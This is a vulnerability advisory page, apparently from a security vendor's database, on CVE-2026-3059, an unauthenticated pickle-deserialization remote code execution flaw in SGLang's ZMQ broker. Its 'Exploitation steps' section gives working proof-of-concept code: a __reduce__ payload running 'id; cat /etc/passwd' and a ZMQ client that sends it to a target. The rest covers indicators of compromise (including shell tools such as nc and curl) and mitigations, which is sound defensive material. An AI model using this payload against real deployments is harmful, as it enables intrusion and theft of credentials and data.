CVE-2026-3059: 
Python vulnerability analysis and mitigation

Overview

CVE-2026-3059 is an unauthenticated remote code execution vulnerability in SGLang's multimodal generation module, caused by unsafe deserialization of untrusted data via pickle.loads() in the ZMQ broker component (scheduler_client.py). It affects SGLang versions 0.5.5 through 0.5.9 (inclusive) and was discovered by Igor Stepansky of Orca Security on February 4, 2026, with coordinated disclosure through CERT/CC (case VU#665416) and public disclosure on March 12, 2026. The vulnerability carries a CVSS v3.1 base score of 9.8 (Critical) (Orca Security, CERT/CC).

Technical details

The root cause is CWE-502 (Deserialization of Untrusted Data): SGLang's multimodal generation server starts a ZeroMQ (ZMQ) REP broker socket that binds to all network interfaces (tcp://*:{broker_port}) with no authentication, TLS, or source IP filtering. The broker's main loop calls pickle.loads() directly on any received bytes without any prior validation, and because Python's pickle protocol encodes arbitrary callable instructions — not just data — an attacker can craft a payload whose __reduce__ method invokes os.system() or any other callable, achieving code execution the instant pickle.loads() runs. The broker port defaults to the HTTP port plus one (e.g., port 8001 when the HTTP server is on 8000), and the vulnerable code path is activated whenever the multimodal generation feature is enabled. A functional PoC using a custom RCEPayload class with a malicious __reduce__ method has been publicly demonstrated (Orca Security, GitHub Source).

Impact

Successful exploitation grants an unauthenticated remote attacker full code execution with the privileges of the SGLang process, typically running inside containerized GPU inference infrastructure (Kubernetes pods, Docker containers, or dedicated GPU nodes). This can result in complete confidentiality, integrity, and availability compromise — including exposure of model weights, inference data, API credentials, and GPU workloads — and may provide a pivot point into the surrounding cluster environment. Default text-only SGLang deployments are not affected; only instances with the multimodal generation feature explicitly enabled and the ZMQ broker port network-reachable are vulnerable (Orca Security).

Exploitability

A functional proof-of-concept exploit is publicly available, requiring only a standard ZMQ REQ socket and a crafted pickle payload — a single-message exploit with no credentials, headers, or complex preconditions. No in-the-wild exploitation has been reported as of the time of publication. The EPSS score is approximately 0.0117 (1.17%), reflecting low but non-negligible exploitation probability given the public PoC and trivial weaponization effort. The vulnerability is not currently listed in the CISA KEV catalog. The SGLang maintainers did not respond to coordinated disclosure efforts prior to public release (Orca Security, CERT/CC).

Exploitation steps

  1. Reconnaissance: Identify internet-facing or network-accessible SGLang deployments running the multimodal generation server (e.g., using Shodan or Censys to find open ZMQ ports). The broker port is typically the HTTP port plus one (e.g., 8001 if HTTP is on 8000, or 30001 if HTTP is on 30000).
  2. Verify ZMQ broker availability: Attempt a ZMQ REQ connection to the target's broker port. A successful ZMTP handshake confirms the broker is listening.
  3. Craft malicious pickle payload: Create a Python class with a __reduce__ method that returns a dangerous callable and arguments:
import os, pickle
class RCEPayload:
    def __init__(self, cmd):
        self.cmd = cmd
    def __reduce__(self):
        return (os.system, (self.cmd,))
payload = pickle.dumps(RCEPayload("id; cat /etc/passwd"))
  1. Send payload via ZMQ: Connect a ZMQ REQ socket to the target broker and send the serialized payload:
import zmq
ctx = zmq.Context()
sock = ctx.socket(zmq.REQ)
sock.connect(f"tcp://{target}:{port}")
sock.send(payload)
  1. Achieve code execution: The SGLang broker calls pickle.loads() on the received bytes, triggering os.system(cmd) with the attacker's command, executing in the context of the SGLang process. The ZMQ REP/REQ pattern returns a response, confirming execution (Orca Security).

Indicators of compromise

  • Network: Unexpected inbound TCP connections to the ZMQ broker port (default: HTTP port + 1, e.g., 8001 or 30001) from external or untrusted source IPs; ZMTP protocol handshakes on non-standard ports; outbound connections from the SGLang process to unexpected external destinations.
  • Process: Unusual child processes spawned by the SGLang Python process, such as /bin/sh, /bin/bash, curl, wget, nc, or python; reverse shell processes originating from the SGLang service account.
  • File System: Unexpected file creation in /tmp/ or other writable directories by the SGLang process; new scripts, cron jobs, or SSH authorized keys created by the SGLang service account.
  • Logs: SGLang application logs showing ZMQ broker receiving messages from unexpected sources; Python exceptions or tracebacks related to pickle deserialization from untrusted payloads; OS-level audit logs recording unexpected execve calls from the SGLang process (Orca Security).

Mitigation and workarounds

SGLang version 0.5.10 addresses CVE-2026-3059 by binding the ZMQ broker socket to localhost (127.0.0.1) instead of all interfaces (*), preventing remote exploitation (PR #21435), and separately replaces unsafe pickle.loads() with a SafeUnpickler for the crash dump replay script (PR #20904) (SGLang v0.5.10). Users should upgrade to SGLang 0.5.10 or later immediately. If immediate patching is not possible, apply the following workarounds:

  • Network segmentation: Use firewall rules to block external access to the ZMQ broker port (HTTP port + 1) and restrict it to localhost or known internal clients only.
  • Disable unused features: If multimodal generation is not in active use, ensure the feature is not enabled at server startup.
  • Audit crash dump handling: Do not run replay_request_dump.py on .pkl files from untrusted or shared directories.

Community reactions

The vulnerability was discovered by Igor Stepansky of Orca Security and coordinated through CERT/CC (VU#665416), with CERT/CC researcher Christopher Cullen contributing a proposed patch and discovering the related CVE-2026-3989. The SGLang maintainers did not respond to coordinated disclosure efforts prior to public release, prompting CERT/CC to contact CISA for additional assistance — a notable failure in vendor response for a critical AI/ML infrastructure component (Orca Security, CERT/CC). Coverage appeared in The Hacker News, Security Online, and SAPInsider, with commentary highlighting the systemic nature of unsafe pickle deserialization across the Python AI/ML ecosystem. A SGLang collaborator noted in the patch PR that "inference services are typically deployed in data centers with private/guarded networks," suggesting the severity may be context-dependent, while the security community broadly emphasized that network-exposed AI infrastructure should not rely on deployment assumptions for security (GitHub PR #20904).

Additional resources


Source: This report was generated using AI

Related Python vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

GHSA-v2f8-6655-7grjCRITICAL10
  • Python logoPython
  • vibe-trading-ai
NoYesOct 02, 2026
CVE-2026-105782HIGH7.5
  • Python logoPython
  • scrapy
NoYesOct 06, 2026
GHSA-v853-p72q-4cfwHIGH7.5
  • Python logoPython
  • quart
NoYesOct 05, 2026
CVE-2026-105751MEDIUM6.9
  • Python logoPython
  • docling
NoYesOct 05, 2026
CVE-2026-105750MEDIUM5.9
  • Python logoPython
  • docling
NoYesOct 05, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management